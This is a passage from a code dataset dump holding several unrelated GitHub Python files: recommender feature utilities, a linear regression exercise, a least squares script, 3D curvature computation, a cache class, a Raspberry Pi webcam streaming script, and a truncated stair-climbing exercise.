'spring_views', 'summer_views', 'autumn_views']\n season_views_df = extract_season(train_sessions_df, item_features_df, columns_views, 'views')\n columns_purchases = ['winter_purchases', 'spring_purchases', 'summer_purchases', 'autumn_purchases']\n season_purchases_df = extract_season(train_purchases_df, item_features_df, columns_purchases, 'purchases')\n\n season_df = season_views_df.merge(right=season_purchases_df, left_index=True, right_index=True)\n season_df.insert(0, 'item_id', season_df.index)\n\n season_df['total_views'] = season_df.apply(lambda x: x[columns_views[0]] + x[columns_views[1]] +\n x[columns_views[2]] + x[columns_views[3]], axis=1)\n season_df['total_purchases'] = season_df.apply(lambda x: x[columns_purchases[0]] + x[columns_purchases[1]] +\n x[columns_purchases[2]] + x[columns_purchases[3]], axis=1)\n\n if use_base_features:\n item_features_unstack = simil_one_hot_mapping(item_features_df, 'feature_category_id',\n 'feature_value_id', 'item_id')\n season_df = item_features_unstack.merge(right=season_df, left_on='item_id', right_on='item_id')\n season_df.reset_index(inplace=True)\n season_df.drop(columns=['index'], inplace=True)\n\n season_df.to_csv(path, index=False)\n return season_df\n\n\nclass VariationalAutoEncoder(keras.Model):\n def __init__(self, inputShape, batchSize, latentSize):\n super(VariationalAutoEncoder, self).__init__()\n self.inputShape = inputShape\n self.batchSize = batchSize\n self.latentSize = latentSize\n self.input_layer = keras.Input(shape=self.inputShape)\n self.e2 = keras.layers.Dense(units=self.latentSize * 4)(self.input_layer)\n self.b2 = tf.keras.layers.BatchNormalization()(self.e2)\n self.r2 = tf.keras.layers.LeakyReLU(alpha=0.3)(self.b2)\n self.d2 = tf.keras.layers.Dropout(0.2, seed=42)(self.r2)\n self.z_mean = keras.layers.Dense(self.latentSize)(self.d2)\n self.z_log_sigma = keras.layers.Dense(self.latentSize)(self.d2)\n self.z = keras.layers.Lambda(self.sampling)([self.z_mean, self.z_log_sigma])\n self.encoder = keras.Model(self.input_layer, [self.z_mean, self.z_log_sigma, self.z], name='encoder')\n self.latent_inputs = keras.Input(shape=(self.latentSize,), name='z_sampling')\n self.e5 = keras.layers.Dense(units=self.latentSize * 4)(self.latent_inputs)\n self.b5 = tf.keras.layers.BatchNormalization()(self.e5)\n self.r5 = tf.keras.layers.LeakyReLU(alpha=0.3)(self.b5)\n self.d5 = tf.keras.layers.Dropout(0.2, seed=42)(self.r5)\n self.output_layer = keras.layers.Dense(self.inputShape[0], activation='sigmoid')(self.d5)\n self.decoder = keras.Model(self.latent_inputs, self.output_layer, name='decoder')\n self.output_layer = self.decoder(self.encoder(self.input_layer)[2])\n self.vae = keras.Model(self.input_layer, self.output_layer, name='vae_mlp')\n\n def sampling(self, args):\n z_mean, z_log_sigma = args\n epsilon = K.random_normal(shape=(K.shape(z_mean)[0], self.latentSize),\n mean=0., stddev=0.1)\n return z_mean + K.exp(z_log_sigma) * epsilon\n\n def call(self, vector):\n z_mean, z_log_sigma, z = self.encoder(vector)\n reconstructed = self.decoder(z)\n kl_loss = -0.5 * tf.reduce_mean(\n z_log_sigma - tf.square(z_mean) - tf.exp(z_log_sigma) + 1\n )\n self.add_loss(kl_loss)\n self.add_metric(kl_loss, name='kl_loss', aggregation='mean')\n return reconstructed\n\n def createEmbedding(self, vector):\n return self.encoder(vector)\n\n\ndef simil_one_hot_mapping(df, column_1, column_2, column_index):\n assert type(column_1) == str and type(column_2) == str and type(column_index) == str\n assert column_1 in df.columns and column_2 in df.columns and column_index in df.columns\n cp = df.copy(deep=True)\n cp['mapping'] = cp[column_1].astype(str) + '-' + cp[column_2].astype(str)\n keys = list(cp['mapping'].unique())\n values = [v for v in range(len(keys))]\n mapping_dict = dict(zip(keys, values))\n cp['mapping'] = cp['mapping'].map(mapping_dict)\n cp.drop([column_1, column_2], axis=1, inplace=True)\n cp['value'] = 1\n cp = cp.pivot(index=column_index, columns='mapping', values='value')\n cp.fillna(value=0, inplace=True)\n cp.reset_index(inplace=True)\n return cp\n\n\ndef get_embeddings(dataset_df, epochs, batch_size, learning_rate, validation_split, latent_dim,\n patience_early, patience_reduce, path, one_hot=False):\n path = path.split('.csv')[0] + '_' + str(latent_dim) + '.csv'\n if os.path.exists(path):\n print('Embeddings already computed, reloading...')\n return pd.read_csv(path)\n print('Embeddings not computed, creating...')\n assert dataset_df.columns[0] == 'item_id'\n if not one_hot:\n dataset_df = simil_one_hot_mapping(dataset_df, 'feature_category_id', 'feature_value_id', 'item_id')\n dataset_tensor = tf.convert_to_tensor(dataset_df.copy(deep=True)[dataset_df.columns[1:]].values)\n auto_encoder = VariationalAutoEncoder(inputShape=(dataset_tensor.shape[1],),\n batchSize=batch_size,\n latentSize=latent_dim)\n auto_encoder.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=learning_rate),\n loss=keras.losses.MeanSquaredError())\n callbacks = [\n tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=patience_early, restore_best_weights=True),\n tf.keras.callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=patience_reduce, min_lr=1e-7,\n verbose=1, cooldown=0)]\n auto_encoder.fit(dataset_tensor, dataset_tensor,\n epochs=epochs,\n batch_size=batch_size,\n validation_split=validation_split,\n callbacks=[callbacks],\n verbose=1)\n encoded_df = pd.DataFrame(auto_encoder.createEmbedding(dataset_tensor)[2])\n encoded_df.insert(0, 'item_id', dataset_df.item_id)\n encoded_df.to_csv(path, index=False)\n return encoded_df\n\n\ndef compute_aggregation_score(item_list, aggregator, values):\n rows = values.loc[values.item_id.isin(item_list)]\n if aggregator == 'sum':\n return np.sum(np.array(rows[rows.columns[1:]]), axis=0)\n if aggregator == 'mean':\n return np.mean(np.array(rows[rows.columns[1:]]), axis=0)\n if aggregator == 'prod':\n return np.prod(np.array(rows[rows.columns[1:]]), axis=0)\n\n\ndef get_session_views_embeddings(sessions, dataset_path, latent_dim, aggregator, path):\n assert aggregator in ['sum', 'mean', 'prod']\n path = path.split('.csv')[0] + '_' + str(latent_dim) + '_' + str(aggregator) + '.csv'\n if os.path.exists(path):\n print('Embedding already computed, reloading...')\n return pd.read_csv(path)\n print('Embeddings not computed, creating...')\n item_features_df = pd.read_csv(dataset_path + 'Dataset/item_features.csv', sep=',')\n item_attributes = simil_one_hot_mapping(item_features_df, 'feature_category_id', 'feature_value_id', 'item_id')\n item_embeddings = get_embeddings(dataset_df=item_attributes[item_attributes.columns[:905]], epochs=200, batch_size=32,\n learning_rate=1e-3, validation_split=0.2, latent_dim=latent_dim, patience_early=10,\n patience_reduce=5, path='../../Dataset/item_embeddings.csv', one_hot=True)\n session_dict = sessions.groupby(['session_id'])['item_id'].progress_apply(lambda items:\n list(items.value_counts().index)).to_dict()\n session_scores_dict = {key: compute_aggregation_score(value, aggregator, item_embeddings)\n for key, value in tqdm(session_dict.items())}\n\n session_scores_df = pd.DataFrame.from_dict(session_scores_dict, orient='index')\n session_scores_df.reset_index(inplace=True)\n session_scores_df.rename(columns={session_scores_df.columns[0]: 'session_id'}, inplace=True)\n session_scores_df.to_csv(path, index=False)\n return session_scores_df\n","repo_name":"recsyspolimi/recsys-challenge-2022-dressipi","sub_path":"RecSys_Course_AT_PoliMi/Pipeline/attributes_utils.py","file_name":"attributes_utils.py","file_ext":"py","file_size_in_byte":12609,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"36987870360","text":"#%%\n# import libraries\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n#%%\n# read data\npath = 'ex1data1.txt'\ndata = pd.read_csv(path, header = None, names= ['Population', 'Profit'])\n\n#%%\n# show imported data details\n# print('data = \\n', data.head(10))\n# print('**************************************')\n# print('data.describe = \\n', data.describe())\n# print('**************************************')\n\n#%%\n# draw data\nfig, ax = plt.subplots(figsize= (6,6))\nplt.scatter(data['Population'], data['Profit'], marker= 'o', s= 12, label= 'Training data')\nax.set(title= 'Best Fit Line', xlabel= 'Population', ylabel= 'Profit')\n\n#%%\n# adding a new column called ones before the data\ndata.insert(0, 'Ones', 1)\n# print('new data = \\n', data.head(10))\n# print('**************************************')\n\n#%%\n# separate X (training data) from y (target variable)\ncols = data.shape[1]\nX = data.iloc[:, 0 : cols-1]\ny = data.iloc[:, cols-1 : cols]\n\n# print('X data = \\n', X.head(10))\n# print('**************************************')\n# print('y data = \\n', y.head(10))\n# print('**************************************')\n\n#%%\n# Convert data from data frames to numpy matrices\nX = np.matrix(X.values)\ny = np.matrix(y.values)\ntheta = np.matrix(np.array(np.zeros((cols-1, 1))))\n\n# print('X \\n', X)\nprint('X.shape = ', X.shape)\nprint('**************************************')\n# print('y \\n', y)\nprint('y.shape = ', y.shape)\nprint('**************************************')\n# print('theta \\n', theta)\nprint('theta.shape = ', theta.shape)\nprint('**************************************')\n\n#%%\n# Cost function\ndef computeCost(X, y, theta):\n J = np.sum(np.power(((X * theta) - y), 2)) / (2 * len(y))\n return float(J)\n\nprint('With theta = [0 : 0]\\nCost computed =', computeCost(X, y, theta))\nprint('Expected cost value (approx) 32.07')\nprint('**************************************')\nprint('With theta = [-1 : 2]\\nCost computed =', computeCost(X, y, np.array([[-1],[2]])))\nprint('Expected cost value (approx) 54.24')\nprint('**************************************')\n\n#%%\n# Running Gradient Descent\ndef gradientDescent(X, y, theta, alpha, num_iters):\n temp = np.matrix(np.zeros(theta.shape))\n J_history = np.zeros((num_iters, 1))\n \n for i in range(num_iters):\n for j in range(len(theta)):\n temp[j, 0] = theta[j, 0] - ((alpha / len(y)) * np.sum(np.multiply(((X * theta) - y), X[:, j])))\n \n theta = temp.copy()\n J_history[i] = computeCost(X, y, theta)\n \n return theta, J_history\n\niterations = 1500\nalpha = 0.01\n\ntheta, J_history = gradientDescent(X, y, theta, alpha, iterations)\n\nprint('Theta found by gradient descent:\\n', theta[0,0], '\\n ', theta[1,0])\nprint('Expected theta values (approx)\\n -3.6303\\n 1.1664')\nprint('**************************************')\n# print('J_history\\n', J_history)\n# print('**************************************')\n\n#%%\n# Plot the linear fit\nplt.plot(X[:, 1], X*theta, 'r-', linewidth= 1.5, label= 'Linear regression')\nplt.legend()\n\n#%%\n# Predict values for population sizes of 35,000 and 70,000\npredict1 = [1., 3.5] * theta\nprint('For population = 35,000, we predict a profit of %f' %(predict1 * 10000))\npredict2 = [1., 7.] * theta\nprint('For population = 70,000, we predict a profit of %f' %(predict2 * 10000))\nprint('**************************************')\n\n#%%\n# draw error graph\nfig, ax = plt.subplots(figsize=(6,6))\nax.plot(np.arange(1, iterations+1), J_history, 'r', linewidth=2)\nax.set(xlabel= 'No. of Iterations', ylabel= 'Cost', title= 'Error vs. Training Epoch')\n\n#%%\n# Visualizing J(theta_0, theta_1)\n\n# Grid over which we will calculate J\ntheta0_vals = np.linspace(-10, 10, 100)\ntheta1_vals = np.linspace(-1, 4, 100)\n\n# initialize J_vals to a matrix of 0's\nJ_vals = np.zeros((len(theta0_vals), len(theta1_vals)))\n\n# Fill out J_vals\nfor i in range(len(theta0_vals)):\n for j in range(len(theta1_vals)):\n t = np.array([[theta0_vals[i]], [theta1_vals[j]]])\n J_vals[i,j] = computeCost(X, y, t)\n \nJ_vals = J_vals.T\ntheta0_vals, theta1_vals = np.meshgrid(theta0_vals, theta1_vals)\nfig, ax = plt.subplots(figsize= (7,7), subplot_kw={'projection' : '3d'})\nax.plot_surface(theta0_vals, theta1_vals, J_vals, cmap= 'jet')\n# ax.view_init(0,90)\nax.set(xlabel= '$\\mathrm{\\\\theta_{0}}$', ylabel= '$\\mathrm{\\\\theta_{1}}$', zlabel= 'Cost Function $\\mathrm{J(\\\\theta)}$')\nplt.plot(theta[0,0], theta[1,0], 'rx', markersize=10, linewidth=2)","repo_name":"xAbdalla/Machine_Learning_Exercises-Stanford_University","sub_path":"Python/ex1/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":4438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"16396095209","text":"'''\nm = n* sum(x*y) - sum(x)-sum(y) / n*sum(x**2) - sum(x) **2\n\nb = sum(y) - m*sum(x) / n\n\nn : representa el valor de la cantidad de datos que nos dan\n\nm : pendiente de nuestra ecuacion lineal\n\nb : valor de origen de coordenadas\n\n\n\n'''\n\n\n\n\n\nimport pandas as pd\nimport numpy as np\nimport sympy \n\nx = sympy.Symbol('x')\n\n# datos: lista de valores (x, y)\ndef min_cuadrado(lista_x, lista_y):\n\n if len(lista_x) != len(lista_y):\n print(\"Las longitudes de la listas no son iguales\")\n else:\n n = len(lista_x)\n #convierto a tipo Numpy las listas dadas por parametro, ya que es mas\n #facil de laburar\n values_x = np.array(lista_x)\n values_y = np.array(lista_y)\n\n\n #calculo las sumatorias\n sum_x = np.sum(values_x)\n sum_y = np.sum(values_y)\n sum_xy = np.sum(values_x*values_y)\n sum_x_x = np.sum(values_x*values_x)\n\n\n #utilizo las formulas para obtener 'm' y 'b'\n #m = n* sum(x*y) - sum(x)-sum(y) / n*sum(x**2) - sum(x) **2\n \n m = ((n * sum_xy) - (sum_x * sum_y)) / ((n * sum_x_x) - (sum_x**2))\n \n #b = sum(y) - m*sum(x) / n\n\n b = (sum_y - m * sum_x) / n\n\n\n return(m * x) + b\n\n\n\nlista_x = [1, 2, 3, 4]\nlista_y = [1.4, 1.1, 0.7, 0.1]\n\n\necuacion = min_cuadrado (lista_x, lista_y)\nprint(ecuacion)\n","repo_name":"T0p2/Practica-de-lenguajes","sub_path":"Practica_nueva/Metodo_min_cuadrado.py","file_name":"Metodo_min_cuadrado.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"33853568379","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n ©\n Author: Karim Makki\n\"\"\"\n\nimport trimesh\nimport numpy as np\nimport nibabel as nib\nimport os\nfrom scipy.ndimage.filters import gaussian_filter\nimport argparse\nimport skfmm\nfrom skimage import measure\nimport timeit\nimport fast_Gaussian_curvature_3D as g3D\n\n\n### Distance calculation limited to narrow band\n\ndef phi_narrow(mask, band=5):\n\n tmp = np.ones(mask.shape)\n tmp[mask!=0]= -1\n sgd = np.array(skfmm.distance(tmp, narrow=band), float)\n R = np.where(sgd != 0)\n sgd[sgd == 0] = 1\n\n return sgd, R\n\ndef local_gaussian_filter(scalar_function, sigma=2):\n\n mask = np.zeros(scalar_function.shape)\n mask[scalar_function!=0] = 1\n smooth_scalar_function = gaussian_filter(scalar_function*mask, sigma=sigma)\n\n return smooth_scalar_function\n\ndef hessian_adjoint_narrowband(hessian,R):\n\n Ha = np.zeros(hessian.shape)\n Ha[0,0,R[0],R[1],R[2]] = hessian[1,1,R[0],R[1],R[2]]*hessian[2,2,R[0],R[1],R[2]] - hessian[1,2,R[0],R[1],R[2]]*hessian[2,1,R[0],R[1],R[2]]\n Ha[0,1,R[0],R[1],R[2]] = hessian[1,2,R[0],R[1],R[2]]*hessian[2,0,R[0],R[1],R[2]] - hessian[1,0,R[0],R[1],R[2]]*hessian[2,2,R[0],R[1],R[2]]\n Ha[0,2,R[0],R[1],R[2]] = hessian[1,0,R[0],R[1],R[2]]*hessian[2,1,R[0],R[1],R[2]] - hessian[1,1,R[0],R[1],R[2]]*hessian[2,0,R[0],R[1],R[2]]\n\n Ha[1,0,R[0],R[1],R[2]] = hessian[0,2,R[0],R[1],R[2]]*hessian[2,1,R[0],R[1],R[2]] - hessian[0,1,R[0],R[1],R[2]]*hessian[2,2,R[0],R[1],R[2]]\n Ha[1,1,R[0],R[1],R[2]] = hessian[0,0,R[0],R[1],R[2]]*hessian[2,2,R[0],R[1],R[2]] - hessian[0,2,R[0],R[1],R[2]]*hessian[2,0,R[0],R[1],R[2]]\n Ha[1,2,R[0],R[1],R[2]] = hessian[0,1,R[0],R[1],R[2]]*hessian[2,0,R[0],R[1],R[2]] - hessian[0,0,R[0],R[1],R[2]]*hessian[2,1,R[0],R[1],R[2]]\n\n Ha[2,0,R[0],R[1],R[2]] = hessian[0,1,R[0],R[1],R[2]]*hessian[1,2,R[0],R[1],R[2]] - hessian[0,2,R[0],R[1],R[2]]*hessian[1,1,R[0],R[1],R[2]]\n Ha[2,1,R[0],R[1],R[2]] = hessian[1,0,R[0],R[1],R[2]]*hessian[0,2,R[0],R[1],R[2]] - hessian[0,0,R[0],R[1],R[2]]*hessian[1,2,R[0],R[1],R[2]]\n Ha[2,2,R[0],R[1],R[2]] = hessian[0,0,R[0],R[1],R[2]]*hessian[1,1,R[0],R[1],R[2]] - hessian[0,1,R[0],R[1],R[2]]*hessian[1,0,R[0],R[1],R[2]]\n\n return Ha\n\n\ndef L2_norm_grad_narrowband(gx,gy,gz,R):\n\n norm_grad = np.zeros(gx.shape)\n norm_grad[R] = np.sqrt(gx[R]**2 + gy[R]**2 + gz[R]**2)\n norm_grad = local_gaussian_filter(norm_grad, sigma=1)\n norm_grad[np.where(norm_grad==0)]=1 # just to avoid dividing by zero\n\n return norm_grad\n\ndef hessian_trace_narrowband(hessian,R):\n\n return hessian[0,0,R[0],R[1],R[2]] + hessian[1,1,R[0],R[1],R[2]] + hessian[2,2,R[0],R[1],R[2]]\n\n\ndef curvatures_narrowband(phi_grad,Ha,hessian,R):\n\n gx, gy, gz = phi_grad\n norm = L2_norm_grad_narrowband(gx,gy,gz,R)\n gx /= norm\n gy /= norm\n gz /= norm\n\n gaussian_curv = np.zeros(gx.shape)\n mean_curv = np.zeros(gx.shape)\n\n gaussian_curv[R] = gx[R] * (gx[R]*Ha[0,0,R[0],R[1],R[2]]+gy[R]*Ha[1,0,R[0],R[1],R[2]]+\\\n gz[R]*Ha[2,0,R[0],R[1],R[2]]) + gy[R] *(gx[R]*Ha[0,1,R[0],R[1],R[2]]+gy[R]*\\\n Ha[1,1,R[0],R[1],R[2]]+gz[R]*Ha[2,1,R[0],R[1],R[2]])+ gz[R] * (gx[R]*Ha[0,2,R[0],R[1],R[2]]\\\n +gy[R]*Ha[1,2,R[0],R[1],R[2]]+gz[R]*Ha[2,2,R[0],R[1],R[2]])\n\n gaussian_curv[R] /= L2_norm_grad_narrowband(gx,gy,gz,R)[R]**4\n\n mean_curv[R] = (gx[R] * (gx[R]*hessian[0,0,R[0],R[1],R[2]]+gy[R]*hessian[1,0,R[0],R[1],R[2]]+gz[R]*hessian[2,0,R[0],R[1],R[2]]) + \\\n gy[R] * (gx[R]*hessian[0,1,R[0],R[1],R[2]]+gy[R]*hessian[1,1,R[0],R[1],R[2]]+gz[R]*hessian[2,1,R[0],R[1],R[2]])\\\n + gz[R] * (gx[R]*hessian[0,2,R[0],R[1],R[2]]+gy[R]*hessian[1,2,R[0],R[1],R[2]]+gz[R]*hessian[2,2,R[0],R[1],R[2]])) \\\n - (L2_norm_grad_narrowband(gx,gy,gz,R)[R]**2 * hessian_trace_narrowband(hessian,R))\n\n mean_curv[R] /= -2*L2_norm_grad_narrowband(gx,gy,gz,R)[R]**3\n\n return gaussian_curv, mean_curv\n\ndef principal_curvatures(K_M, K_G):\n\n tmp = np.sqrt(np.absolute(K_M**2- K_G))\n k1 = K_M - tmp\n k2 = K_M + tmp\n\n return k1, k2\n\n\ndef save_result(verts,curv,save_path):\n\n res = np.append(verts,curv[...,None],axis=1)\n np.save(save_path, res)\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-in', '--mask', help='3D shape binary mask, as NIFTI file', type=str, required = True)\n parser.add_argument('-o', '--output', help='output directory', type=str, default = './Gaussian_curvature_results3D')\n\n args = parser.parse_args()\n\n # Example of use : python3 curvatures_narrowband.py -in ./3D_data/stanford_bunny_binary.nii.gz -o /home/karim/Bureau/Courbure/narrow_band\n\n output_path = args.output\n\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n\n shape = nib.load(args.mask).get_data()\n\n start_time = timeit.default_timer()\n\n shape, dx, dy, dz = g3D.bbox_3D(shape,5)\n\n phi, R = phi_narrow(shape,5) ## distance calculation limited to narrow band\n phi = local_gaussian_filter(phi, sigma=2) ## smoothing of the level set signed distance function on a narrow band\n\n#################### Computation of Gaussian and mean curvatures ###############################\n phi_grad, hessian = g3D.hessian(phi) ### To do in narrowband\n Ha = hessian_adjoint_narrowband(hessian,R)\n Gaussian_curvature, mean_curvature = curvatures_narrowband(phi_grad,Ha,hessian,R)\n#################################################################################################\n#################### Computation of principal curvatures #######################################\n K1, K2 = principal_curvatures(mean_curvature, Gaussian_curvature)\n#################################################################################################\n # extract explicitly the implicit surface mesh using the scikit-image toolbox\n\n verts, faces, normals, values = measure.marching_cubes_lewiner(phi, 0.0)\n print(verts.shape)\n\n ### Affect per-vertex curvature values, with a nearest neighbour interpolation of vertices on the grid\n gaussian_curv = g3D.texture_spline_interpolation3D(verts, Gaussian_curvature)\n mean_curv = g3D.texture_spline_interpolation3D(verts, mean_curvature)\n k1 = g3D.texture_spline_interpolation3D(verts, K1)\n k2 = g3D.texture_spline_interpolation3D(verts, K2)\n\n elapsed = timeit.default_timer() - start_time\n print(\"The proposed method takes (in seconds):\\n\")\n print(elapsed)\n\n verts = g3D.align_origin_back(verts,dx,dy,dz)\n m = trimesh.Trimesh(vertices=verts, faces=faces)\n m.export(os.path.join(output_path, \"surface_mesh.obj\"))\n\n #### Save results as numpy array arrays\n\n save_result(verts,gaussian_curv,os.path.join(output_path,\"gaussian_curv.npy\"))\n save_result(verts,mean_curv,os.path.join(output_path,\"mean_curv.npy\"))\n save_result(verts,k1,os.path.join(output_path,\"min_curv.npy\"))\n save_result(verts,k2,os.path.join(output_path,\"max_curv.npy\"))\n save_result(verts,2*gaussian_curv,os.path.join(output_path,\"Ricci_scalar.npy\"))\n\n ## Display results\n\n g3D.display_mesh(verts, faces, normals, gaussian_curv, os.path.join(output_path, \"Gaussian_curvature_Makki.png\"))\n g3D.display_mesh(verts, faces, normals, 2*gaussian_curv, os.path.join(output_path, \"Ricci_scalar_Makki.png\"))\n g3D.display_mesh(verts, faces, normals, mean_curv, os.path.join(output_path, \"mean_curvature_Makki.png\"))\n g3D.display_mesh(verts, faces, normals, k1, os.path.join(output_path, \"Minimum_curvature_Makki.png\"))\n g3D.display_mesh(verts, faces, normals, k2, os.path.join(output_path, \"Maximum_curvature_Makki.png\"))\n","repo_name":"k16makki/Medima_tools","sub_path":"curvatures_narrowband.py","file_name":"curvatures_narrowband.py","file_ext":"py","file_size_in_byte":7523,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"72235041503","text":"from lib.loggers import Logger\n\nlogger = Logger()\n\n\nclass Cache(dict):\n DEBUG = False\n\n def __str__(self):\n representation = (\n \"{ \" + \", \".join([f\"'{key}': ...\" for key in self.keys()]) + \"}\"\n )\n\n return representation\n\n def delete(self, key: str) -> None:\n if self.DEBUG:\n logger.info(f\"Deleting key '{key}' from cache.\")\n\n del self[key]\n","repo_name":"asynched/search-engine-api","sub_path":"src/lib/cache/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"21309595496","text":"import sys\nimport configparser\nimport logging\nimport os\nimport requests\nimport smtplib\nimport picamera\nfrom time import sleep\nfrom email.mime.text import MIMEText\nimport RPi.GPIO as GPIO\nimport time\nfrom datetime import datetime, time\nimport subprocess\nimport socket\nimport threading\nfrom threading import Thread\nimport shutil\n\nconfig = configparser.ConfigParser()\nconfig.read('webcam.ini')\n\nlogger = logging.getLogger(__name__)\nhandler = logging.FileHandler(config['DEFAULT']['log.file'])\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\nlogger.addHandler(logging.StreamHandler())\nlogger.setLevel(logging.ERROR)\nsnapshot_interval = int(config['DEFAULT']['camera.snapshot.interval'])\n\nclass Webcam:\n\n def get_file_ip_address(self):\n file_name = 'ipaddress'\n if os.path.isfile(file_name):\n file = open('ipaddress', 'r')\n ip_address = file.read()\n file.close()\n logger.debug('file ip address is %s' % ip_address)\n return ip_address\n\n def set_file_ip_address(self, ip_address):\n file_name = 'ipaddress'\n if os.path.isfile(file_name):\n file = open('ipaddress', 'w')\n file.write(ip_address)\n file.close()\n logger.info('changed file ip address to %s' % ip_address)\n\n def get_router_ip_address(self):\n request = requests.get('http://ipecho.net/plain')\n if request.status_code == 200:\n ip_address = request.text\n logger.debug('router ip address is %s' % ip_address)\n return ip_address\n\n def send_email(self, subject, message):\n fromaddr = config['DEFAULT']['mail.from']\n toaddrs = config['DEFAULT']['mail.to']\n\n msg = MIMEText(message)\n msg['Subject'] = subject\n msg['From'] = fromaddr\n msg['To'] = toaddrs\n\n username = config['DEFAULT']['smtp.username']\n password = config['DEFAULT']['smtp.password']\n\n server = smtplib.SMTP(\"smtp.gmail.com\", 587)\n server.starttls()\n server.login(username, password)\n server.sendmail(fromaddr, toaddrs, msg.as_string())\n server.quit()\n\n def update_noip(self, ip_address):\n url = 'https://dynupdate.no-ip.com/nic/update?hostname=%s&myip=%s' % (config['DEFAULT']['noip.hostname'], ip_address)\n headers = {'Authorization': 'Basic %s' % config['DEFAULT']['noip.authorization'], 'User-Agent': '%s' % config['DEFAULT']['noip.useragent']}\n request = requests.get(url, headers=headers)\n if request.status_code == 200:\n logger.info('changed no-ip address to %s' % ip_address)\n return True\n else:\n logger.error('problem updating no-ip address: %s' % request.text)\n return False\n\n def start_camera(self):\n camera = picamera.PiCamera()\n camera.resolution = (1024, 768)\n camera.exposure_mode = 'sports'\n camera.vflip = True\n camera.exposure_mode = 'auto'\n camera.metering = 'average'\n sleep(3)\n\n snapshot = Snapshot(camera)\n snapshot.start()\n\n stream_server = StreamServer(camera)\n stream_server.start()\n\nclass Snapshot(Thread):\n\n def __init__(self, camera):\n Thread.__init__(self)\n self.camera = camera\n\n def run(self):\n\n while True:\n now = datetime.now()\n now_time = now.time()\n if now_time >= time(6,00) and now_time <= time(21,30):\n timestamp = now.strftime('%m/%d %H:%M:%S')\n timestamp += \" (\" + self.get_temp() + \")\"\n self.camera.annotate_text = timestamp\n\n try:\n if self.camera.recording:\n logger.debug('take snapshot using video port')\n self.camera.capture('/var/www/html/camera.jpg', use_video_port=True)\n else:\n logger.debug('take snapshot')\n self.camera.capture('/var/www/html/camera.jpg')\n\n shutil.copy('/var/www/html/camera.jpg', '/var/www/html/timelapse/camera-%s.jpg' % now.strftime('%Y-%m-%d_%H:%M:%S'))\n except:\n logger.error('unexpected snapshot error: ', sys.exc_info()[0])\n\n sleep(snapshot_interval)\n\n def get_temp(self):\n try:\n output = subprocess.check_output([\"/opt/vc/bin/vcgencmd\", \"measure_temp\"])\n text = output.decode('utf-8')\n return text[5:-3]\n except:\n return \"\"\n\nclass StreamServer(Thread):\n\n def __init__(self, camera):\n Thread.__init__(self)\n self.camera = camera\n\n def run(self):\n logger.info('stream server is started')\n\n server_socket = socket.socket()\n server_socket.bind(('0.0.0.0', 8000))\n server_socket.listen(0)\n\n try:\n while True:\n logger.debug('waiting for connection')\n connection = server_socket.accept()[0]\n\n logger.debug('create stream')\n stream = Stream(self.camera, connection)\n stream.start()\n finally:\n logger.info('stream server is stopped')\n server_socket.close()\n\nclass Stream(Thread):\n\n def __init__(self, camera, connection):\n Thread.__init__(self)\n self.camera = camera\n self.connection = connection\n\n def run(self):\n logger.debug('start recording')\n file = self.connection.makefile('wb')\n self.camera.start_recording(file, format='h264')\n\n try:\n while True:\n self.camera.wait_recording(60)\n except (ConnectionResetError):\n logger.warn('connection reset error')\n self.camera.stop_recording()\n except:\n logger.error('unexpected streaming error: ', sys.exc_info()[0])\n self.camera.stop_recording()\n self.connection.close()\n file.close()\n","repo_name":"jeffjohnston/webcam","sub_path":"webcam.py","file_name":"webcam.py","file_ext":"py","file_size_in_byte":6049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"30098600219","text":"\"\"\" 210616 16:00 항해 37번 by 신영\"\"\"\n\"\"\"\n계단 오르기 게임은 계단 아래 시작점부터 계단 꼭대기에 위치한 도착점까지 가는 게임이다. 각각의 계단에는 일정한 점수가 쓰여 있는데 계단을 밟으면 그 계단에 쓰여 있는 점수를 얻게 된다.\n계단 오르는 데는 다음과 같은 규칙이 있다.\n계단은 한 번에 한 계단씩 또는 두 계단씩 오를 수 있다. 즉, 한 계단을 밟으면서 이어서 다음 계단이나, 다음 다음 계단으로 오를 수 있다.\n연속된 세 개의 계단을 모두 밟아서는 안 된다. 단, 시작점은 계단에 포함되지 않는다.\n마지막 도착 계단은 반드시 밟아야 한다.\n이 게임에서 얻을 수 있는 총 점수의 최댓값을 구하는 프로그램을 작성하시오.\n입력\n입력의 첫째 줄에 계단의 개수가 주어진다.\n둘째 줄부터 한 줄에 하나씩 제일 아래에 놓인 계단부터 순서대로 각 계단에 쓰여 있는 점수가 주어진다. 계단의 개수는 300이하의 자연수이고, 계단에 쓰여 있는 점수는 10, 000이하의 자연수이다.\n출력\n첫째 줄에 계단 오르기 게임에서 얻을 수 있는 총 점수의 최댓값을 출력한다.\n입력 \n6\n10\n20\n15\n25\n10\n20\n출력 75\n\"\"\"\n# from sys import stdin\n# stairs = int(stdin.readline())\n\n# for _ in range(stairs):\n # score = int(stdin.readline())\n # scoreLst.append(score)\n\nstairs = 6\nscoreLst = [10, 20, 15, 25, 10, 20]\nscoreLst.reverse()\n# scoreLst.append(0)\n\nv1Score = 20\nv2Score = 20\nindexV1 = 1\nindexV2 = 2\n\nwhile indexV1 <= len(scoreLst):\n v1Score += scoreLst[indexV1]\n indexV1 += 2\n if indexV1 >= len(scoreLst):\n break\n v1Score += scoreLst[indexV1]\n indexV1 += 